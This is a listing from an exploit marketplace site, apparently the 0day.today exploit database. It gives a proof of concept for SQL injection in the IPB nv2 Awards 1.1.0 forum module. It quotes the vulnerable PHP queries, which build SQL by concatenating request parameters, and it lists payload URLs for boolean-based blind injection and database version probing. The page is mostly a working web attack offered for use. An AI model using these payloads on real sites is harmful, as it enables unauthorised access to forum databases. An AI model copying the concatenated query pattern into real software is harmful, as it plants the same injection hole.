[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

IPB (nv2) Awards > 1.1.0 SQL Injection PoC

Author
fred777
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10736
Category
web applications
Date add
30-01-2010
Platform
unsorted
==========================================
IPB (nv2) Awards > 1.1.0 SQL Injection PoC
==========================================

#################################################
+
+  Author:      fred777 - [fred777.de]
+  Link:          http://forums.invisionize.com/nv2-Awards-120-t137847.html
+  Vuln:         index.php?autocom=awards&do=view&id=1
+
#################################################
 
--[ Vuln Code ] --
 
$this->ipsclass->DB->build_query( array( 'select' => 'a.user_id',
                                                   'from' => array( 'awarded' => 'a' ),
                      'where' => 'a.award_id=' . $this->ipsclass->input['id'],
                      'add_join' => array( 0 => array( 'select' => 'm.members_display_name',
                      'from' => array( 'members' => 'm' ),
                        'where' => 'm.id=a.user_id',
                          'type' => 'left',
                                                                                 ) ),
                      ) );
 
--------------------------------------------------------------------------------------
 
        'select' => '*',
        'from' => 'awards',
        'where' => 'id = "' . $_POST['award'] . '"',
        ) );
 
--------------------------------------------------------------------------------------
 
        $award_dat['user_id'] = $_GET['id'];
        $award_dat['award_id'] = $_POST['award'];
 
################################################
 
--[ Exploitable ]--
 
http://server/index.php?autocom=awards&do=view&id=1[SQL INJECTION]
 
http://server/index.php?autocom=awards&do=view&id=1+and+1=1 > true
http://server/index.php?autocom=awards&do=view&id=1+and+1=0 > false
 
http://server/index.php?autocom=awards&do=view&id=1+and+substring(version(),1,1)=5
http://server/index.php?autocom=awards&do=view&id=1+and+substring(version(),1,1)=4
 
################################################



#  0day.today [2024-12-26]  #